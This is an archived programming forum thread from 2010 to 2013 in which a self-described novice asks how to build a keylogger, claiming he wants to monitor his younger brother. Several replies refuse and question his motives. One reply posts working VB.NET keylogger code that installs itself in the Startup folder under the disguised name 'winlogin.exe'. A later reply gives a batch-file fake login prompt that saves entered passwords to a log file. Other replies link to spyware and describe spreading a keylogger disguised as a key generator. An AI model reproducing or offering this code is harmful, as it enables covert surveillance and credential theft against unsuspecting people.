none
Keylogger using Notepad. Windows XP

Pregunta

• Can I make a keylogger, using NOTHING but notepad?

Is it possible?

I am a COMPLETE amateur at VBS

I can barely write a program that can open and close a cd tray >.>...

Anyway.

Let me know please.

Thanks,

Young, and learning...Have mercy.
    • Cambiado SJWhiteley lunes, 26 de julio de 2010 13:06 (From:Visual Basic General)
    domingo, 25 de julio de 2010 5:54

Todas las respuestas

• Why not create simple an application with a textbox, that is almost a notepad,

Because of the fact that keylogers are base of malicious code, is it not clean to show that in a forum.

Success
    Cor
    domingo, 25 de julio de 2010 5:57
  • I'm sorry, relatively new to the programming side of computers.

I was more into the Sys. Admin. side.

My little brother however seems to be...

Creating a .bat file....

I would like to know what it is...

I'm hoping he is putting his knowledge to GOOD use...

But, I am STILL curious none the less.

Sure he's only 13 but, still...

The reason why I am asking for a keylogger, is because he is doing this ONLINE, somewhere, on some site and saving it there.

What's more is that he's using MY computer.

I would rather NOT have him getting ME in trouble since the P.C. is primarily mine.

How do I KNOW, I've walked in on him several times... only to see him closing a window with various code, like I said, COMPLETE amateur... so who knows.

Id LOVE to tell our parents but... well I'm not sure they know what email is.

So, I doubt they would do anything >.>...

The only reason I know it's a .bat or something is because I can go to my history, and see his activity and it is saved on some random like social site and the file is called like .bat.

I know this is not clean, to show on a forum, so if you could perhaps email me the instructions?

darkwolf(at)gmx.com

(At)=@

And seriously.

What's a textbox?

are we talking like

mgsbox=

stuff or like, something else?

domingo, 25 de julio de 2010 6:34
  • Try this link

http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/batch.mspx?mfr=true

Coding4fun Be a good forum member mark posts that contain the answers to your questions or those that are helpful
    Please format the code in your posts with the button . Makes it easier to read . Or use the Forum Code Formatter by JohnWein http://social.msdn.microsoft.com/Forums/en-US/vbgeneral/thread/bf977a14-d9d4-4e84-9784-bf76b9e23261
    domingo, 25 de julio de 2010 8:50
  • What if your brother detect the keylogger program on your computer and terminate before doing any typing on the keyboard? he may be smart enough to know if program is keylogger.

You may try other forums outside MSDN. There are some forum or blog out there that will give you the code you need but any malicious activities is prohibited on MSDN. Also, freeware keylogger are out there which you can download.

If you want to create yours from scratch, then try keylogger forum for tutorial http://forum.keylogger.org/?board=discussion

kaymaf

CODE CONVERTER SITE

http://www.carlosag.net/Tools/CodeTranslator/.

http://www.developerfusion.com/tools/convert/csharp-to-vb/.

domingo, 25 de julio de 2010 12:27
  • What if your brother detect the keylogger program on your computer and terminate before doing any typing on the keyboard? he may be smart enough to know if program is keylogger.

CODE CONVERTER SITE

http://www.carlosag.net/Tools/CodeTranslator/ .

http://www.developerfusion.com/tools/convert/csharp-to-vb/ .

He's smart.  I'll give him that, but I'm smarter.

He doesn't have the permissions to terminate a process.

And I'm PRETTY sure there's a way to label it as svchost or something.

Maybe I WILL keep the name, keylogger, or whatever it is.

Let him KNOW it is there, so he is deterred from doing anything malicious.

I don't necessarily NEED to know what he's working on, only that it's NOT malicious and if it is, he'll cease it immediately.

Try this link

http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/batch.mspx?mfr=true

Coding4fun Be a good forum member mark posts that contain the answers to your questions or those that are helpful
    Please format the code in your posts with the button . Makes it easier to read . Or use the Forum Code Formatter by JohnWein http://social.msdn.microsoft.com/Forums/en-US/vbgeneral/thread/bf977a14-d9d4-4e84-9784-bf76b9e23261

I thank you for the link, but I'm pretty familiar with what a .bat file is.

I can create several, whether it be a prank type thing or a disk cleanup, I have one on my desktop right now, that is a shutdown button. Although, this is by using DOS cmd. So *Shrug*.

And seriously, again...

What's a textbox >.>...(Sorry, again, a complete amateur.)

Does it go by any different names?

Thanks for the help though, I appreciate it.

I will try all the forum links and tell you the ones that worked.

domingo, 25 de julio de 2010 14:50
  • The reason why I am asking for a keylogger, is because he is doing this ONLINE, somewhere, on some site and saving it there.

How is he able to do that on a site that he does not control or have administrator rights ?

domingo, 25 de julio de 2010 21:10
  • I'm sorry, relatively new to the programming side of computers.

My little brother however seems to be...

Creating a .bat file....

I'm hoping he is putting his knowledge to GOOD use...

But, I am STILL curious none the less.

Sure he's only 13 but, still...

well, with a Forum name like Chaos_Edit and an email address like darkwolf, I really wonder WHO is doing what...

and why is it always "my little brother" or "my little sister" is doing this?

Anyway,

http://social.msdn.microsoft.com/Forums/en-US/vbgeneral/thread/053a0a87-e9b8-42e7-b483-d6d47c41278e

And as kaymaf said, this is not the place to ask a question like that. Find another less responsible Forum or blog. Hopefully the moderators will lock this thread.

domingo, 25 de julio de 2010 21:50
  • Here is one key logger i made, basically it writes every letter typed to a textbox. (it also installs itself into the start-up folder no matter what OS you have (XP or Vista or 7 or ETC.)

Public Class Form1
      Dim result As Integer
      Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
      Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        For i = 1 To 255
          result = 0
          result = GetAsyncKeyState(i)
          If result = -32767 Then
            TextBox1.Text = TextBox1.Text + Chr(i)
          End If
        Next i
      End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        If System.IO.File.Exists("C:\users\" & System.Environment.UserName & _
                     "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogin.exe") = False Then

FileCopy(System.Windows.Forms.Application.ExecutablePath, "C:\users\" & System.Environment.UserName & _
               "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogin.exe")
        Else
          If System.IO.File.Exists("C:\Documents and Settings\" & System.Environment.UserName & "\Start Menu\Programs\Startup\winlogin.exe") = False Then

FileCopy(System.Windows.Forms.Application.ExecutablePath, "C:\Documents and Settings\" & System.Environment.UserName & "\Start Menu\Programs\Startup\winlogin.exe")
          End If
        End If
      End Sub
    End Class

lunes, 26 de julio de 2010 1:11
  • Thank, RollsRoycePhantom95.

For the REST of you >.<

Darkwolf was an account I created five years ago, bite me, I was a moody depressed teenager.

Chaos, is currently my nickname. NO it has NOTHING to do with computers.

And again, WTF is a Textbox. >.<

Oh, and, would I like, put this as like a .bat?

Or VBS?

Or....

And, where would I go to view what has been typed?

I TOLD you people that i have NO idea >.< when it comes to the programming side.

I can open a CD tray... with a VBS script. THAT'S IT!!

Ok, sorry for being so rude.

Thank you, to all those who helped and gave suggestions.

lunes, 26 de julio de 2010 1:32
  • And again, WTF is a Textbox. >.<

It's a small furry animal indiginous to certain areas of the higher mountains in ...

If you're not even familiar with this, with all due respect, what led you to this forum?

lunes, 26 de julio de 2010 1:44
  • Ok, I think...

I may be getting confused...

A textbox is OBVIOUSLY something you type in >.>...DUH >.<

But, the first user said

Why not create simple an application with a textbox, that is almost a notepad

That made it sound like a type of program...

Anyway, I know this is the coding forum.

I know keyloggers are code.

And, I know that if I were to ask on the Answers forum (That I frequently habit and help out on) they would point me here.

lunes, 26 de julio de 2010 1:51
  • Just keep who ever it is off your computer . I don't think your going to get much help here since your knowledge is too limited to understand what he might be doing and it would take too long to explain the most basic information to you . You supply only vague information so all your going to get is someones best guess . I won't help anyone make a keylogger and do not want anyone else on this forum to do so either . Besides even if you had a keylogger you wouldn't understand what your reading anyway even if in fact what you say is even true in the first place . This forum is for helping people with thier code not covering your butt . If your that concerned password protect your computer and when you let someone use it monitor their every move .
    lunes, 26 de julio de 2010 2:28
  • Ok

1) The program should be a windows forms application.

2) A textbox is what you view text in

3) Depends how will you want to view the key logged text reply and i will help you with that.

P.S Do you have any version of Microsoft Visual Basic.

I hope you are using this on your comp. not someone else's. I don't want to aid in malicious program development.

lunes, 26 de julio de 2010 2:57
  • The answer to your original question is Yes - it is possible to create program code (such as a VB Script) using only the facilities of notepad.  The program code is simply a plain text file.    The reference to a text box was irrelevant. 

To make that code do something useful requires additional facilities, such as a compiler or interpreter. You would have used an interpreter when you executed that code you wrote to open and close the CD tray.

For instance, VBS and QuickBASIC source code is often created using a simple text editor such as notepad.  It is then executed with an interpreter.

Whether or not the program that is created can do key logging depends on the language used - not on the utility that was used to create the source code.   Not all programming languages support source code created using a text editor such as notepad, so you need to match the ability to use plain text files for creating the source code (because that's what notepad can do) with the ability to create the sort of code that can do keylogging.

For instance, although VB.Net can support plain text files for the source code, it is complex and not worth the trouble.  It can be used to create keylogging code.  VBS can use plain text files for the source code (it doesn't have any other way of creating them) but I don't know if it can do keylogging or not - I suspect not.

If the critical point is that you only want to use notepad or similar, then ask in a VBS forum about whether or not VBS can be used to create a keylogger (but be ready for questions about your motives).

If the critical point is that you need to create a keylogger, then ask about how to do that in VB .Net, because there's no point in using notepad to create VB .Net source code when you have all the facilities of the development environment available to you.  But be ready for enquries about your motives.

lunes, 26 de julio de 2010 3:05
    1. @echo off
    2. color a
    3. title Login
    4. cls
    5. echo Please Enter Email Adress And Password
    6. echo.
    7. echo.
    8. cd "C:\Logs"
    9. set /p user=Username:
    10. set /p pass=Password:
    11. echo Username="%user%" Password="%pass%" >Log.txt
    12. start >>Program Here<<
    13. exit

1.) Now paste that into Notepad and save it as a Logger.bat file.

2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.

3.) Drag that folder in to the C:\

4.) Test out the Logger.bat!

5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]

jueves, 17 de mayo de 2012 8:27
  • X=MsgBox("TYPE WHAT YOU WANT HERE",2+16,"TITLE OF MESSAGE")

Type what you want here is the comment and title of message is what you want to name your message box.

jueves, 17 de mayo de 2012 8:29
  • you can try this link:http://www.mysuperspy.com/windows-keylogger.htm it can help you with your problem.
    miércoles, 19 de septiembre de 2012 2:36
  • kk well if your brothers running a .bat file its easily done either go to notepad and type command.com then save it something like chees.bat you need the bat to work but if you have windows 7 then you go to start and search cmd i highly doubt that hes can program a keylogger when hes only 13 but maybe he an anyway. the cmd or (command prompt) is your operating systems registry you can acces basicly anything make admin get files not suppost to but he would have had to program it in eclipse or vbs then when the keyloggers made im not telling how to make it but you can easily find it its illegal though. But he could be sending a download link to that file disguised as a key generator etc then nothing happens they will think that the .exe is broken so they will leave it but its actually running in the background so everytime the victim click a key it will send to your computer which means you would be responsible if he got hold of personal details such as credit cards but if you want to block cmd i dont think you can but hope i helped.
    jueves, 31 de enero de 2013 17:24
  • You can find loads of free scripts on hotscripts.com
    viernes, 01 de febrero de 2013 5:23